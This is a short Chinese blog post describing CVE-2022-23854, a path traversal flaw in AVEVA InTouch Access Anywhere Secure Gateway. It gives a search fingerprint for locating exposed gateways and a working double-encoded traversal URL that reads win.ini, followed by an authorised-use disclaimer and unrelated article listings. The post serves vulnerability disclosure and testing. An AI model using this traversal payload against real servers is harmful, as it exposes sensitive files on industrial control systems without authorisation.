AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854

最新推荐文章于 2023-02-08 10:44:43 发布
最新推荐文章于 2023-02-08 10:44:43 发布
阅读量735 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 安全 网络 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17754023/article/details/127460845
版权

漏洞描述

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。

漏洞影响

AVEVA InTouch安全网关

网络测绘

body="InTouch Access Anywhere"

漏洞复现

登录页面 

 

验证POC

/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

 

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
 

一个梦字
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Android BroadcastAnyWhere(Google Bug 17356824)漏洞详细分析
简行之旅
11-18 8484
继上次Android的<a href="http://blog.csdn.net/l173864930/article/details/38755621">LaunchAnyWhere组件安全漏洞</a>后,最近Google在Android 5.0的源码上又修复了一个高危漏洞,该漏洞简直是LaunchAnyWhere的姊妹版——BroadcastAnyWhere。通过这个漏洞,攻击者可以以system用户的身份发送广播,这意味着攻击者可以无视一切的BroadcastReceiver组件访问限制。而且该漏洞
InTouch-Access-Anywhere教程
05-10
非常简洁明了的InTouch-Access-Anywhere详细配置教程。
intouch & access
07-12
intouch & access 的连接
Intouch Access连接
04-15
详细的介绍了进制间进行快速的转换的便捷实用方法。。。
Wonderware配置-Intouch读取数据 6
zhougynui的博客
05-20 1万+
Wonderware配置-Intouch读取数据 InTouch HMI软件用于可视化和控制工业生产过程。它为工程师提供了一种易用的开发环境和广泛的功能,使工程师能够快速地建立、测试和部署强大的连接和传递实时信息的自动化应用。InTouch软件是一个开放的、可扩展的人机界面,为定制应用程序设计提供了灵活性,同时为工业中的各种自动化设备提供了连接能力。 一.读取数据基本流程 1.      依
Visio-AVEVA PLANT实施流程
07-15
Visio-AVEVA PLANT实施流程,讲得很细很细的流程,欢迎大家下载
Datasheet_AVEVA_InTouchEdgeHMI_11-19_Avineage_AVEVAInTouchEdge_A
09-30
8. **安全与合规性**:作为一款面向工业环境的产品,AVEVA InTouch Edge HMI会考虑安全性和合规性,包括数据保护、网络安全和符合行业标准的认证。 9. **用户友好**:AVEVA InTouch Edge HMI通常具有直观的用户界面...
关于S7-1200和S7-1500与DASSIDirect通讯的问题.docx
08-23
在工业自动化领域,西门子S7-1200和S7-1500 PLC(可编程逻辑控制器)是广泛应用的控制器型号,而DASSIDirect则是一款用于与这些PLC进行通信的软件。本文将深入探讨如何在西门子TIA博途软件中配置S7-1200和S7-1500,...
Intouch2017的临时授权
07-01
Intouch2017是一款由Wonderware公司开发的先进的可视化软件,主要应用于工业自动化领域的监控与数据采集系统(SCADA)。这款软件以其直观的用户界面、强大的数据处理能力和灵活的集成能力而广受赞誉。Intouch2017的...
INTOUCH连接ACCESS数据库图文教程.pdf
07-14
INTOUCH连接ACCESS数据库图文教程.pdf
INTOUCH说明书
07-13
INTOUCH9.5中文版说明书 关于本手册 本手册由逻辑上相互连贯的多个章节组成,介绍构建 InTouch 应用程序所涉及的方方面面。 它采用“过程化”的形式编写而成,以带有序号的步骤阐述如何执行大多数功能或任务。 如果联机阅读本手册,看到绿色的文本时,单击该文本可以“跳转”到所引用的部分或章节。 跳转到另一节或另一章之后,如果要返回原来的章节,请使用提供的“后退”选项。
intouch连接AB-Plc步骤
01-23
Intouch组态与AB PLC以太网通讯详解 1、 首先设电脑的IP地址 需要根据PLC的IP地址来设定PC的IP。前三段保持一样,第四段是0-255之间的数,但不能相同。
INTOUCH报警数据库启用方法.doc
11-01
INTOUCH报警数据库启用方法doc,INTOUCH报警数据库启用方法
PDMS-01设备建模基础.pptx
04-12
PDMS 安装文件及安装教程路径:PDMS 安装文件可以在 AVEVA 官方网站下载,安装教程路径可以根据实际情况进行设置。PDMS 项目文件路径:PDMS 工程文件可以保存在本地磁盘或服务器上,以便多人协同设计。 PDMS 登录 ...
Intouch2020安装与授权
热门推荐
weixin_43997027的博客
11-04 2万+
(6)运行InTouch HMI Application Manager,打开工程,在帮助(H)中的关于WindowMaker,查看详情。首先附上Intouch下载百度网盘,此网盘由施耐德客服提供,目前Intouch2020 R2 SP1为最新版本(2022年10月28日)(3)根据需求安装相应的功能,如图为基础需求,然后Next。(10)安装完成后,可配置,也可以直接Close。(4)选择授权文件,勾选并Activate。(9)安装完成,点击Configure。(5)选择:简体中文,然后Next。
AVEVA学习
qq_42295268的博客
02-08 2349
AVEVA软件学习
三、Intouch 和 PLC进行modbus RTU通讯
厉枭鹏的点滴记录
02-07 8989
上一章成功安装好MBSerial DAServer 2.5 SP2驱动自后,开始配置,intouch通过改驱动和PLC进行modbus通讯。 SMC中配置驱动如下图,串口号注意选择自己电脑对应的串口就行。 在SMC中的LOG View会对modbus驱动信息进行打印,如果通讯异常,会显示异常信息。我们可以在安装的手册中,查找问题的原因。(我最早配置也出现问题,就是看手...
aveva intouch2020通过驱动 oi server 连接s7 plc
最新发布
01-06
Aveva InTouch 2020是一款先进的工业自动化人机界面(HMI)软件,可用于监视和控制PLC(可编程逻辑控制器)等设备。它通过驱动OI Server与S7 PLC进行连接。 在PLC和电脑之间建立通信连接的过程中,需要使用特定的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值